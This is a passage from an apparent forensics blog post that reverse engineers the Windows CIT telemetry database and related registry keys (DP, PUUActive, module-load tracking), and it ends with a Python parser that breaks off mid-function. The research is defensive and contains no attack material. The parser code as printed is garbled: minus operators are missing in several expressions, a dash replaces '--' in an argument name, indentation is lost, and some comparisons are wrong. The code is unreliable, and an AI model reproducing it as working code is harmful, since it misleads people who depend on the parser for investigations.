DWORD Crc32; /* Crc32 of the entire buffer, skipping this field */
DWORD EntrySize;
DWORD EntryCount;
DWORD EntryDataOffset;
DWORD SystemDataSize;
DWORD SystemDataOffset;
DWORD BaseUseDataSize;
DWORD BaseUseDataOffset;
FILETIME StartTimeLocal; /* Presumably when the aggregation started */
FILETIME PeriodStartLocal; /* Presumably the starting point of the aggregation period */
DWORD AggregationPeriodInS; /* Presumably the duration over which this data was gathered
* Always 604800 (7 days) */
DWORD BitPeriodInS; /* Presumably the amount of seconds a single bit represents
* Always 3600 (1 hour) */
DWORD SingleBitmapSize; /* This appears to be the sizes of the Stats buffers, always 21 */
DWORD _Unk0; /* Always 0x00000100? */
DWORD HeaderSize;
DWORD _Unk1; /* Always 0x00000000? */
} CIT_HEADER;
typedef struct _CIT_PERSISTED {
DWORD BitmapsOffset; /* Array of Offset and Size (DWORD, DWORD) */
DWORD BitmapsSize;
DWORD SpanStatsOffset; /* Array of Count and Duration (DWORD, DWORD) */
DWORD SpanStatsSize;
DWORD StatsOffset; /* Array of WORD */
DWORD StatsSize;
} CIT_PERSISTED;
typedef struct _CIT_ENTRY {
DWORD ProgramDataOffset; /* Offset to CIT_PROGRAM_DATA */
DWORD UseDataOffset; /* Offset to CIT_PERSISTED */
DWORD ProgramDataSize;
DWORD UseDataSize;
} CIT_ENTRY;
typedef struct _CIT_PROGRAM_DATA {
DWORD FilePathOffset; /* Offset to UTF-16-LE file path string */
DWORD FilePathSize; /* strlen of string */
DWORD CommandLineOffset; /* Offset to UTF-16-LE command line string */
DWORD CommandLineSize; /* strlen of string */
DWORD PeTimeDateStamp; /* aka Extra1 */
DWORD PeCheckSum; /* aka Extra2 */
DWORD Extra3; /* aka Extra3, some flag from PROCESSINFO struct */
} CIT_PROGRAM_DATA;
view raw CITDB2.h hosted with ❤ by GitHub

When compared against the initial guessed structures, we can immediately get a feeling for the overall format of the CIT. Decompressed, the CIT is made up of a small header, a global “system use data”, a global “use data” and a bunch of entries. Each entry has its’ own “use data” as well as references to a file path and optional command line string.

Interpreting the data

Figuring out how to parse data is the easy part, interpreting this data is oftentimes much harder.

Looking at the structures we came up with, we have something called “use data” that contains some bitmaps, “stats” and “span stats”. Bitmaps are usually straightforward since there are only so many ways you can interpret those, but “stats” and “span stats” can mean just about anything. However, we still have the issue that the “system use data” has multiple bitmaps.

To more confidently interpet the data, it’s best we look at how it’s created. Further reverse engineering brings us to wink32base.sys, win32kfull.sys for newer Windows versions (e.g. Windows 10+), and win32k.sys for older Windows versions (e.g. Windows 7, Server 2012).

In the CIT header, we can see a BitPeriodInS, SingleBitmapSize and AggregationPeriodInS. With some values from a real header, we can confirm that (BitPeriodInS * 8) * SingleBitmapSize = AggregationPeriondInS. We also have a PeriodStartLocal field which is usually a nicely rounded timestamp. From this, we can make a fairly confident assumption that for every bit in the bitmap, the application in the entry or the system was used within a BitPeriodInS time window. This means that the bitmaps track activity over a larger time period in some period size, by default an hour. Reverse engineered code seems to support this, too. Note that all of this is in local time, not UTC.

For the “stats” or “span stats”, it’s not that easy. We have no indication of what these values might mean, other than their integer size. The parsing code seems to suggest they might be tuples, but that may very well be a compiler optimization. We at least know they aren’t offsets, since their values are often far larger than the size of the CIT.

Further reverse engineering win32k.sys seems to suggest that the “stats” are in fact individual counters, being incremented in functions such as CitSessionConnectChange, CitDesktopSwitch, etc. These functions get called from other relevant functions in win32k.sys, like xxxSwitchDesktop that calls CitDesktopSwitch. One of the smaller increment functions can be seen below as an example:

void __fastcall CitThreadGhostingChange(tagTHREADINFO *pti)
{
struct _CIT_USE_DATA *UseData; // rax
__int16 v2; // cx
if ( g_CIT_IMPACT_CONTEXT )
{
if ( _bittest((const signed __int32 *)&pti->TIF_flags, 0x1Fu) )
{
UseData = CitpProcessGetUseData(pti->ppi);
if ( UseData )
{
v2 = –1;
if ( (unsigned __int16)(UseData->Stats.ThreadGhostingChanges + 1) >= UseData->Stats.ThreadGhostingChanges )
v2 = UseData->Stats.ThreadGhostingChanges + 1;
UseData->Stats.ThreadGhostingChanges = v2;
}
}
}
}

The increment events are different between the system use data and the program use data. If we map these increments out to the best of our ability, we end up with the following structures:

struct _CIT_SYSTEM_DATA_STATS
{
WORD Unknown_BootIdRelated0;
WORD Unknown_BootIdRelated1;
WORD Unknown_BootIdRelated2;
WORD Unknown_BootIdRelated3;
WORD Unknown_BootIdRelated4;
WORD SessionConnects;
WORD ProcessForegroundChanges;
WORD ContextFlushes;
WORD MissingProgData;
WORD DesktopSwitches;
WORD WinlogonMessage;
WORD WinlogonLockHotkey;
WORD WinlogonLock;
WORD SessionDisconnects;
};
struct _CIT_USE_DATA_STATS
{
WORD Crashes;
WORD ThreadGhostingChanges;
WORD Input;
WORD InputKeyboard;
WORD Unknown;
WORD InputTouch;
WORD InputHid;
WORD InputMouse;
WORD MouseLeftButton;
WORD MouseRightButton;
WORD MouseMiddleButton;
WORD MouseWheel;
};
view raw CITStruct.h hosted with ❤ by GitHub

There are some interesting tracked statistics here, such as the amount of times someone logged on, locked their system, or how many times they clicked or pressed a key in an application.

We can see similar behaviour for “span stats”, but in this case it appears to be a pair of (count, duration). Similarly, if we map these increments out to the best of our ability, we end up with the following structures:

struct _CIT_SPAN_STAT_ITEM
{
  DWORD Count;
  DWORD Duration;
};
struct _CIT_SYSTEM_DATA_SPAN_STATS
{
  _CIT_SPAN_STAT_ITEM ContextFlushes0;
  _CIT_SPAN_STAT_ITEM Foreground0;
  _CIT_SPAN_STAT_ITEM Foreground1;
  _CIT_SPAN_STAT_ITEM DisplayPower0;
  _CIT_SPAN_STAT_ITEM DisplayRequestChange;
  _CIT_SPAN_STAT_ITEM DisplayPower1;
  _CIT_SPAN_STAT_ITEM DisplayPower2;
  _CIT_SPAN_STAT_ITEM DisplayPower3;
  _CIT_SPAN_STAT_ITEM ContextFlushes1;
  _CIT_SPAN_STAT_ITEM Foreground2;
  _CIT_SPAN_STAT_ITEM ContextFlushes2;
};
struct _CIT_USE_DATA_SPAN_STATS
{
  _CIT_SPAN_STAT_ITEM ProcessCreation0;
  _CIT_SPAN_STAT_ITEM Foreground0;
  _CIT_SPAN_STAT_ITEM Foreground1;
  _CIT_SPAN_STAT_ITEM Foreground2;
  _CIT_SPAN_STAT_ITEM ProcessSuspended;
  _CIT_SPAN_STAT_ITEM ProcessCreation1;
};
view raw CITStruct2.h hosted with ❤ by GitHub

Finally, when looking for all references to the bitmaps, we can identify the following bitmaps stored in the “system use data”:

struct _CIT_SYSTEM_DATA_BITMAPS
{
_CIT_BITMAP DisplayPower;
_CIT_BITMAP DisplayRequestChange;
_CIT_BITMAP Input;
_CIT_BITMAP InputTouch;
_CIT_BITMAP Unknown;
_CIT_BITMAP Foreground;
};

We can also identify that the single bitmap linked to each program entry is a bitmap of “foreground” activity for the aggregation period.

In the original source, I suspect these fields are accessed by index with an enum, but mapping them to structs makes for easier reverse engineering. You can also still see some unknowns in there, or unspecified fields such as Foreground0 and Foreground1. This is because the differentiation between these is currently unclear. For example, both counters might be incremented upon a foreground switch, but only one of them when a specific flag or condition is true. The exact condition or meaning of the flag is currently unknown.

Newer Windows versions

During the reverse engineering of the various win32k modules, I noticed something disappointing: the CIT database seems to no longer exist in the same form on newer Windows versions. Some of the same code remains and some new code was introduced, but any relation to the stored CIT database as described up until now seems to no longer exists. Maybe it’s now handled somewhere else and I couldn’t find it, but I also haven’t encountered any recent Windows host that has had CIT data stored on it.

Something else seems to have taken its place, though. We have some stored DP and PUUActive (Post Update Use Info) data instead. If the running Windows version is a “multi-session SKU”, as determined by the RtlIsMultiSessionSku API, these values are stored under the key HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. Otherwise, they are stored under HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT.

Post Update Use Info

We can apply the same technique here as we did with the older CIT database, which is to look at how ETW messages are being created from the data. A little bit of reversing later and we get the following structure:

typedef struct _CIT_POST_UPDATE_USE_INFO {
DWORD UpdateKey;
WORD UpdateCount;
WORD CrashCount;
WORD SessionCount;
WORD LogCount;
DWORD UserActiveDurationInS;
DWORD UserOrDispActiveDurationInS;
DWORD DesktopActiveDurationInS;
WORD Version;
WORD _Unk0;
WORD BootIdMin;
WORD BootIdMax;
DWORD PMUUKey;
DWORD SessionDurationInS;
DWORD SessionUptimeInS;
DWORD UserInputInS;
DWORD MouseInputInS;
DWORD KeyboardInputInS;
DWORD TouchInputInS;
DWORD PrecisionTouchpadInputInS;
DWORD InForegroundInS;
DWORD ForegroundSwitchCount;
DWORD UserActiveTransitionCount;
DWORD _Unk1;
FILETIME LogTimeStart;
QWORD CumulativeUserActiveDurationInS;
WORD UpdateCountAccumulationStarted;
WORD _Unk2;
DWORD BuildUserActiveDurationInS;
DWORD BuildNumber;
DWORD _UnkDeltaUserOrDispActiveDurationInS;
DWORD _UnkDeltaTime;
DWORD _Unk3;
} CIT_POST_UPDATE_USE_INFO;

Looks like we lost the information for individual applications, but we still get a lot of usage data.

DP

Once again we can apply the same technique, resulting in the following:

typedef struct _CIT_DP_MEMOIZATION_ENTRY {
DWORD Unk0;
DWORD Unk1;
DWORD Unk2;
} CIT_DP_MEMOIZATION_ENTRY;
typedef struct _CIT_DP_MEMOIZATION_CONTEXT {
_CIT_DP_MEMOIZATION_ENTRY Entries[12];
} CIT_DP_MEMOIZATION_CONTEXT;
typedef struct _CIT_DP_DATA {
WORD Version;
WORD Size;
WORD LogCount;
WORD CrashCount;
DWORD SessionCount;
DWORD UpdateKey;
QWORD _Unk0;
FILETIME _UnkTime;
FILETIME LogTimeStart;
DWORD ForegroundDurations[11];
DWORD _Unk1;
_CIT_DP_MEMOIZATION_CONTEXT MemoizationContext;
} CIT_DP_DATA;
view raw CITDP.h hosted with ❤ by GitHub

I haven’t looked too deeply into the memoization shown here, but it’s largely irrelevant when parsing the data. We see some of the same fields we also saw in the PUU data, but also a ForegroundDurations array. This appears to be an array of foreground durations in milliseconds for a couple of hardcoded applications:

  • Microsoft Internet Explorer
    • IEXPLORE.EXE
  • Microsoft Edge
    • MICROSOFTEDGE.EXE, MICROSOFTEDGECP.EXE, MICROSOFTEDGEBCHOST.EXE, MICROSOFTEDGEDEVTOOLS.EXE
  • Google Chrome
    • CHROME.EXE
  • Microsoft Word
    • WINWORD.EXE
  • Microsoft Excel
    • EXCEL.EXE
  • Mozilla Firefox
    • FIREFOX.EXE
  • Microsoft Photos
    • MICROSOFT.PHOTOS.EXE
  • Microsoft Outlook
    • OUTLOOK.EXE
  • Adobe Acrobat Reader
    • ACRORD32.EXE
  • Microsoft Skype
    • SKYPE.EXE

Each application is given an index in this array, starting from 1. Index 0 appears to be reserved for a cumulative time. It is not currently known if this list of applications changes between Windows versions. It’s also not currently known what “DP” stands for.

Other findings

While looking for some test CIT data, I stumbled upon two other pieces of information stored in the registry under the CIT registry key.

Telemetry answers

This information is stored at the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\win32k, under a subkey of some arbitrary version number. It contains values with the value name being the ImageFileName of the process, and the value being a flag indicating what types of messages or telemetry this application received during its lifetime. For example, the POWERBROADCAST flag is set if NtUserfnPOWERBROADCAST is called on a process, which itself it called from NtUserMessageCall. Presumably a system message if the power state of the system changed (e.g. a charger was plugged in). Currently known values are:

POWERBROADCAST = 0x10000
DEVICECHANGE = 0x20000
IME_CONTROL = 0x40000
WINHELP = 0x80000
view raw Knownvalues.h hosted with ❤ by GitHub

You can discover which events a process received by masking the stored value with these values. For example, the value 0x30000 can be interpreted as POWERBROADCAST|DEVICECHANGE, meaning that a process received those events.

This behaviour was only present in a Windows 7 win32k.sys and seems to no longer be present in more recent Windows versions. I have also seen instances where the values 4 and 8 were used, but have not been able to find a corresponding executable that produces these values. In most win32k.sys the code for this is inlined, but in some the function name AnswerTelemetryQuestion can be seen.

Modules

Another interesting registry key is HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module. It has subkeys for certain runtime DLLs (for example, System32/mrt100.dll or Microsoft.NET/Framework64/v4.0.30319/clr.dll), and each subkey has values for applications that have loaded this module. The name of the value is once again the ImageFileName and the value is a standard Windows timestamp of when the value was written.

These values are written by ahcache.sys, function CitmpLogUsageWorker. This function is called from CitmpLoadImageCallback, which subsequently is the callback function provided to PsSetLoadImageNotifyRoutine. The MSDN page for this function says that this call registers a “driver-supplied callback that is subsequently notified whenever an image is loaded (or mapped into memory)”. This callback checks a couple of conditions. First, it checks if the module is loaded from a system partition, by checking the DO_SYSTEM_SYSTEM_PARTITION flag of the underlying device. Then it checks if the image it’s loading is from a set of tracked modules. This list is optionally read from the registry key HKLM\System\CurrentControlSet\Control\Session Manager\AppCompatCache and value Citm, but has a default list to fall back to. The version of ahcache.sys that I analysed contained:

  • \System32\mrt100.dll
  • Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
  • Microsoft.NET\Framework\v1.0.3705\mscorsvr.dll
  • Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
  • Microsoft.NET\Framework\v1.1.4322\mscorsvr.dll
  • Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
  • \Microsoft.NET\Framework\v4.0.30319\clr.dll
  • \Microsoft.NET\Framework64\v4.0.30319\clr.dll
  • \Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll

The tracked module path is concatenated to the aforementioned registry key to, for example, result in the key HKLM\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v1.0.3705/mscorwks.dll. Note the replaced path separators to not conflict with the registry path separator. It does a final check if there are not more than 64 values already in this key, or if the ImageFileName of the executable exceeds 520 characters. In the first case, the current system time is stored in the OverflowQuota value. In the second case, the value name OverflowValue is used.

So far I haven’t found anything that actually removes values from this registry key, so OverflowQuota effectively contains the timestamp of the last execution to load that module, but which already had more than 64 values. If these values are indeed never removed, it unfortunately means that these registry keys only contain the first 64 executables to load these modules.

This behaviour seems to be present from Windows 10 onwards.

Summary

We showed how to parse the CIT database and provide some additional information on what it stores. The information presented may not be perfect, but this was just a couple of days worth of research into CIT. We hope it’s useful to some and perhaps also a showcase of a method to quickly research topics like these.

We also discovered the lack of the CIT database on newer Windows versions, and these new DP and PUUActive values. We provided some information on what these structures contain and structure definitions to easily parse them.

Finally, we also provide code to parse the CIT database yourself. It’s just the code to parse the CIT contents and doesn’t do anything to access the registry. There’s also no code to parse the other mentioned registry keys, since registry access is very implementation specific between investigation tools, and the values are quite trivial to parse out. We have implemented all of these findings into our investigation framework, which enables us to use them on all types of evidence data that we encounter.

We invite anyone curious on this topic to provide feedback and information for anything we may have missed or misinterpreted.

Source

#!/usr/bin/env python3
import array
import argparse
import io
import struct
import sys
from binascii import crc32
from datetime import datetime, timedelta, timezone
try:
from dissect import cstruct
from Registry import Registry
except ImportError:
print("Missing dependencies, run:\npip install dissect.cstruct python-registry")
sys.exit(1)
try:
from zoneinfo import ZoneInfo
HAS_ZONEINFO = True
except ImportError:
HAS_ZONEINFO = False
cit_def = """
typedef QWORD FILETIME;
flag TELEMETRY_ANSWERS {
POWERBROADCAST = 0x10000,
DEVICECHANGE = 0x20000,
IME_CONTROL = 0x40000,
WINHELP = 0x80000,
};
typedef struct _CIT_HEADER {
WORD MajorVersion;
WORD MinorVersion;
DWORD Size; /* Size of the entire buffer */
FILETIME CurrentTimeLocal; /* Maybe the time when the saved CIT was last updated? */
DWORD Crc32; /* Crc32 of the entire buffer, skipping this field */
DWORD EntrySize;
DWORD EntryCount;
DWORD EntryDataOffset;
DWORD SystemDataSize;
DWORD SystemDataOffset;
DWORD BaseUseDataSize;
DWORD BaseUseDataOffset;
FILETIME StartTimeLocal; /* Presumably when the aggregation started */
FILETIME PeriodStartLocal; /* Presumably the starting point of the aggregation period */
DWORD AggregationPeriodInS; /* Presumably the duration over which this data was gathered
* Always 604800 (7 days) */
DWORD BitPeriodInS; /* Presumably the amount of seconds a single bit represents
* Always 3600 (1 hour) */
DWORD SingleBitmapSize; /* This appears to be the sizes of the Stats buffers, always 21 */
DWORD _Unk0; /* Always 0x00000100? */
DWORD HeaderSize;
DWORD _Unk1; /* Always 0x00000000? */
} CIT_HEADER;
typedef struct _CIT_PERSISTED {
DWORD BitmapsOffset; /* Array of Offset and Size (DWORD, DWORD) */
DWORD BitmapsSize;
DWORD SpanStatsOffset; /* Array of Count and Duration (DWORD, DWORD) */
DWORD SpanStatsSize;
DWORD StatsOffset; /* Array of WORD */
DWORD StatsSize;
} CIT_PERSISTED;
typedef struct _CIT_ENTRY {
DWORD ProgramDataOffset; /* Offset to CIT_PROGRAM_DATA */
DWORD UseDataOffset; /* Offset to CIT_PERSISTED */
DWORD ProgramDataSize;
DWORD UseDataSize;
} CIT_ENTRY;
typedef struct _CIT_PROGRAM_DATA {
DWORD FilePathOffset; /* Offset to UTF-16-LE file path string */
DWORD FilePathSize; /* strlen of string */
DWORD CommandLineOffset; /* Offset to UTF-16-LE command line string */
DWORD CommandLineSize; /* strlen of string */
DWORD PeTimeDateStamp; /* aka Extra1 */
DWORD PeCheckSum; /* aka Extra2 */
DWORD Extra3; /* aka Extra3, some flag from PROCESSINFO struct */
} CIT_PROGRAM_DATA;
typedef struct _CIT_BITMAP_ITEM {
DWORD Offset;
DWORD Size;
} CIT_BITMAP_ITEM;
typedef struct _CIT_SPAN_STAT_ITEM {
DWORD Count;
DWORD Duration;
} CIT_SPAN_STAT_ITEM;
typedef struct _CIT_SYSTEM_DATA_SPAN_STATS {
CIT_SPAN_STAT_ITEM ContextFlushes0;
CIT_SPAN_STAT_ITEM Foreground0;
CIT_SPAN_STAT_ITEM Foreground1;
CIT_SPAN_STAT_ITEM DisplayPower0;
CIT_SPAN_STAT_ITEM DisplayRequestChange;
CIT_SPAN_STAT_ITEM DisplayPower1;
CIT_SPAN_STAT_ITEM DisplayPower2;
CIT_SPAN_STAT_ITEM DisplayPower3;
CIT_SPAN_STAT_ITEM ContextFlushes1;
CIT_SPAN_STAT_ITEM Foreground2;
CIT_SPAN_STAT_ITEM ContextFlushes2;
} CIT_SYSTEM_DATA_SPAN_STATS;
typedef struct _CIT_USE_DATA_SPAN_STATS {
CIT_SPAN_STAT_ITEM ProcessCreation0;
CIT_SPAN_STAT_ITEM Foreground0;
CIT_SPAN_STAT_ITEM Foreground1;
CIT_SPAN_STAT_ITEM Foreground2;
CIT_SPAN_STAT_ITEM ProcessSuspended;
CIT_SPAN_STAT_ITEM ProcessCreation1;
} CIT_USE_DATA_SPAN_STATS;
typedef struct _CIT_SYSTEM_DATA_STATS {
WORD Unknown_BootIdRelated0;
WORD Unknown_BootIdRelated1;
WORD Unknown_BootIdRelated2;
WORD Unknown_BootIdRelated3;
WORD Unknown_BootIdRelated4;
WORD SessionConnects;
WORD ProcessForegroundChanges;
WORD ContextFlushes;
WORD MissingProgData;
WORD DesktopSwitches;
WORD WinlogonMessage;
WORD WinlogonLockHotkey;
WORD WinlogonLock;
WORD SessionDisconnects;
} CIT_SYSTEM_DATA_STATS;
typedef struct _CIT_USE_DATA_STATS {
WORD Crashes;
WORD ThreadGhostingChanges;
WORD Input;
WORD InputKeyboard;
WORD Unknown;
WORD InputTouch;
WORD InputHid;
WORD InputMouse;
WORD MouseLeftButton;
WORD MouseRightButton;
WORD MouseMiddleButton;
WORD MouseWheel;
} CIT_USE_DATA_STATS;
// PUU
typedef struct _CIT_POST_UPDATE_USE_INFO {
DWORD UpdateKey;
WORD UpdateCount;
WORD CrashCount;
WORD SessionCount;
WORD LogCount;
DWORD UserActiveDurationInS;
DWORD UserOrDispActiveDurationInS;
DWORD DesktopActiveDurationInS;
WORD Version;
WORD _Unk0;
WORD BootIdMin;
WORD BootIdMax;
DWORD PMUUKey;
DWORD SessionDurationInS;
DWORD SessionUptimeInS;
DWORD UserInputInS;
DWORD MouseInputInS;
DWORD KeyboardInputInS;
DWORD TouchInputInS;
DWORD PrecisionTouchpadInputInS;
DWORD InForegroundInS;
DWORD ForegroundSwitchCount;
DWORD UserActiveTransitionCount;
DWORD _Unk1;
FILETIME LogTimeStart;
QWORD CumulativeUserActiveDurationInS;
WORD UpdateCountAccumulationStarted;
WORD _Unk2;
DWORD BuildUserActiveDurationInS;
DWORD BuildNumber;
DWORD _UnkDeltaUserOrDispActiveDurationInS;
DWORD _UnkDeltaTime;
DWORD _Unk3;
} CIT_POST_UPDATE_USE_INFO;
// DP
typedef struct _CIT_DP_MEMOIZATION_ENTRY {
DWORD Unk0;
DWORD Unk1;
DWORD Unk2;
} CIT_DP_MEMOIZATION_ENTRY;
typedef struct _CIT_DP_MEMOIZATION_CONTEXT {
_CIT_DP_MEMOIZATION_ENTRY Entries[12];
} CIT_DP_MEMOIZATION_CONTEXT;
typedef struct _CIT_DP_DATA {
WORD Version;
WORD Size;
WORD LogCount;
WORD CrashCount;
DWORD SessionCount;
DWORD UpdateKey;
QWORD _Unk0;
FILETIME _UnkTime;
FILETIME LogTimeStart;
DWORD ForegroundDurations[11];
DWORD _Unk1;
_CIT_DP_MEMOIZATION_CONTEXT MemoizationContext;
} CIT_DP_DATA;
"""
c_cit = cstruct.cstruct()
c_cit.load(cit_def)
class CIT:
def __init__(self, buf):
compressed_fh = io.BytesIO(buf)
compressed_size, uncompressed_size = struct.unpack("<2I", compressed_fh.read(8))
self.buf = lznt1_decompress(compressed_fh)
self.header = c_cit.CIT_HEADER(self.buf)
if self.header.MajorVersion != 0x0A:
raise ValueError("Unsupported CIT version")
digest = crc32(self.buf[0x14:], crc32(self.buf[:0x10]))
if self.header.Crc32 != digest:
raise ValueError("Crc32 mismatch")
system_data_buf = self.data(self.header.SystemDataOffset, self.header.SystemDataSize, 0x18)
self.system_data = SystemData(self, c_cit.CIT_PERSISTED(system_data_buf))
base_use_data_buf = self.data(self.header.BaseUseDataOffset, self.header.BaseUseDataSize, 0x18)
self.base_use_data = BaseUseData(self, c_cit.CIT_PERSISTED(base_use_data_buf))
entry_data = self.buf[self.header.EntryDataOffset :]
self.entries = [Entry(self, entry) for entry in c_cit.CIT_ENTRY[self.header.EntryCount](entry_data)]
def data(self, offset, size, expected_size=None):
if expected_size and size > expected_size:
size = expected_size
data = self.buf[offset : offset + size]
if expected_size and size < expected_size:
data.ljust(expected_size, b"\x00")
return data
def iter_bitmap(self, bitmap: bytes):
bit_delta = timedelta(seconds=self.header.BitPeriodInS)
ts = wintimestamp(self.header.PeriodStartLocal)
for byte in bitmap:
if byte == b"\x00":
ts += 8 * bit_delta
else:
for bit in range(8):
if byte & (1 << bit):
yield ts
ts += bit_delta
class Entry:
def __init__(self, cit, entry):
self.cit = cit
self.entry = entry
program_buf = cit.data(entry.ProgramDataOffset, entry.ProgramDataSize, 0x1C)
self.program_data = c_cit.CIT_PROGRAM_DATA(program_buf)
use_data_buf = cit.data(entry.UseDataOffset, entry.UseDataSize, 0x18)
self.use_data = ProgramUseData(cit, c_cit.CIT_PERSISTED(use_data_buf))
self.file_path = None
self.command_line = None
if self.program_data.FilePathOffset:
file_path_buf = cit.data(self.program_data.FilePathOffset, self.program_data.FilePathSize * 2)
self.file_path = file_path_buf.decode("utf-16-le")
if self.program_data.CommandLineOffset:
command_line_buf = cit.data(self.program_data.CommandLineOffset, self.program_data.CommandLineSize * 2)
self.command_line = command_line_buf.decode("utf-16-le")
def __repr__(self):
return f"<Entry file_path={self.file_path!r} command_line={self.command_line!r}>"
class BaseUseData:
MIN_BITMAPS_SIZE = 0x8
MIN_SPAN_STATS_SIZE = 0x30
MIN_STATS_SIZE = 0x18
def __init__(self, cit, entry):
self.cit = cit
self.entry = entry
bitmap_items = c_cit.CIT_BITMAP_ITEM[entry.BitmapsSize // len(c_cit.CIT_BITMAP_ITEM)](
cit.data(entry.BitmapsOffset, entry.BitmapsSize, self.MIN_BITMAPS_SIZE)
)
bitmaps = [cit.data(item.Offset, item.Size) for item in bitmap_items]
self.bitmaps = self._parse_bitmaps(bitmaps)
self.span_stats = self._parse_span_stats(
cit.data(entry.SpanStatsOffset, entry.SpanStatsSize, self.MIN_SPAN_STATS_SIZE)
)
self.stats = self._parse_stats(cit.data(entry.StatsOffset, entry.StatsSize, self.MIN_STATS_SIZE))
def _parse_bitmaps(self, bitmaps):
return BaseUseDataBitmaps(self.cit, bitmaps)
def _parse_span_stats(self, span_stats_data):
return None
def _parse_stats(self, stats_data):
return None
class BaseUseDataBitmaps:
def __init__(self, cit, bitmaps):
self.cit = cit
self._bitmaps = bitmaps
def _parse_bitmap(self, idx):
return list(self.cit.iter_bitmap(self._bitmaps[idx]))
class SystemData(BaseUseData):
MIN_BITMAPS_SIZE = 0x30
MIN_SPAN_STATS_SIZE = 0x58
MIN_STATS_SIZE = 0x1C
def _parse_bitmaps(self, bitmaps):
return SystemDataBitmaps(self.cit, bitmaps)
def _parse_span_stats(self, span_stats_data):
return c_cit.CIT_SYSTEM_DATA_SPAN_STATS(span_stats_data)
def _parse_stats(self, stats_data):
return c_cit.CIT_SYSTEM_DATA_STATS(stats_data)
class SystemDataBitmaps(BaseUseDataBitmaps):
def __init__(self, cit, bitmaps):
super().__init__(cit, bitmaps)
self.display_power = self._parse_bitmap(0)
self.display_request_change = self._parse_bitmap(1)
self.input = self._parse_bitmap(2)
self.input_touch = self._parse_bitmap(3)
self.unknown = self._parse_bitmap(4)
self.foreground = self._parse_bitmap(5)
class ProgramUseData(BaseUseData):
def _parse_bitmaps(self, bitmaps):
return ProgramDataBitmaps(self.cit, bitmaps)
def _parse_span_stats(self, span_stats_data):
return c_cit.CIT_USE_DATA_SPAN_STATS(span_stats_data)
def _parse_stats(self, stats_data):
return c_cit.CIT_USE_DATA_STATS(stats_data)
class ProgramDataBitmaps(BaseUseDataBitmaps):
def __init__(self, cit, use_data):
super().__init__(cit, use_data)
self.foreground = self._parse_bitmap(0)
# Some inlined utility functions for the purpose of the POC
def wintimestamp(ts, tzinfo=timezone.utc):
# This is a slower method of calculating Windows timestamps, but works on both Windows and Unix platforms
# Performance is not an issue for this POC
return datetime(1970, 1, 1, tzinfo=tzinfo) + timedelta(seconds=float(ts) * 1e-7 11644473600)
# LZNT1 derived from https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/filesystems/lznt1.py
def _get_displacement(offset):
"""Calculate the displacement."""
result = 0
while offset >= 0x10:
offset >>= 1
result += 1
return result
DISPLACEMENT_TABLE = array.array("B", [_get_displacement(x) for x in range(8192)])
COMPRESSED_MASK = 1 << 15
SIGNATURE_MASK = 3 << 12
SIZE_MASK = (1 << 12) 1
TAG_MASKS = [(1 << i) for i in range(0, 8)]
def lznt1_decompress(src):
"""LZNT1 decompress from a file-like object.
Args:
src: File-like object to decompress from.
Returns:
bytes: The decompressed bytes.
"""
offset = src.tell()
src.seek(0, io.SEEK_END)
size = src.tell() offset
src.seek(offset)
dst = io.BytesIO()
while src.tell() offset < size:
block_offset = src.tell()
uncompressed_chunk_offset = dst.tell()
block_header = struct.unpack("<H", src.read(2))[0]
if block_header & SIGNATURE_MASK != SIGNATURE_MASK:
break
hsize = block_header & SIZE_MASK
block_end = block_offset + hsize + 3
if block_header & COMPRESSED_MASK:
while src.tell() < block_end:
header = ord(src.read(1))
for mask in TAG_MASKS:
if src.tell() >= block_end:
break
if header & mask:
pointer = struct.unpack("<H", src.read(2))[0]
displacement = DISPLACEMENT_TABLE[dst.tell() uncompressed_chunk_offset 1]
symbol_offset = (pointer >> (12 displacement)) + 1
symbol_length = (pointer & (0xFFF >> displacement)) + 3
dst.seek(symbol_offset, io.SEEK_END)
data = dst.read(symbol_length)
# Pad the data to make it fit.
if 0 < len(data) < symbol_length:
data = data * (symbol_length // len(data) + 1)
data = data[:symbol_length]
dst.seek(0, io.SEEK_END)
dst.write(data)
else:
data = src.read(1)
dst.write(data)
else:
# Block is not compressed
data = src.read(hsize + 1)
dst.write(data)
result = dst.getvalue()
return result
def print_bitmap(name, bitmap, indent=8):
print(f"{' ' * indent}{name}:")
for entry in bitmap:
print(f"{' ' * (indent + 4)}{entry}")
def print_span_stats(span_stats, indent=8):
for key, value in span_stats._values.items():
print(f"{' ' * indent}{key}: {value.Count} times, {value.Duration}ms")
def print_stats(stats, indent=8):
for key, value in stats._values.items():
print(f"{' ' * indent}{key}: {value}")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("input", type=argparse.FileType("rb"), help="path to SOFTWARE hive file")
parser.add_argument("–tz", default="UTC", help="timezone to use for parsing local timestamps")
args = parser.parse_args()
if not HAS_ZONEINFO:
print("[!] zoneinfo module not available, falling back to UTC")
tz = timezone.utc
else:
tz = ZoneInfo(args.tz)
hive = Registry.Registry(args.input)
try:
cit_key = hive.open("Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\System")
except Registry.RegistryKeyNotFoundException:
parser.exit("No CIT\\System key found in the hive specified!")
for cit_value in cit_key.values():
data = cit_value.value()
if len(data) <= 8:
continue
print(f"Parsing {cit_value.name()}")
cit = CIT(data)
print("Period start:", wintimestamp(cit.header.PeriodStartLocal, tz))
print("Start time:", wintimestamp(cit.header.StartTimeLocal, tz))
print("Current time:", wintimestamp(cit.header.CurrentTimeLocal, tz))
print("Bit period in hours:", cit.header.BitPeriodInS // 60 // 60)
print("Aggregation period in hours:", cit.header.AggregationPeriodInS // 60 // 60)
print()
print("System:")
print(" Bitmaps:")
print_bitmap("Display power", cit.system_data.bitmaps.display_power)
print_bitmap("Display request change", cit.system_data.bitmaps.display_request_change)
print_bitmap("Input", cit.system_data.bitmaps.input)
print_bitmap("Input (touch)", cit.system_data.bitmaps.input_touch)
print_bitmap("Unknown", cit.system_data.bitmaps.unknown)
print_bitmap("Foreground", cit.system_data.bitmaps.foreground)
print(" Span stats:")
print_span_stats(cit.system_data.span_stats)
print(" Stats:")
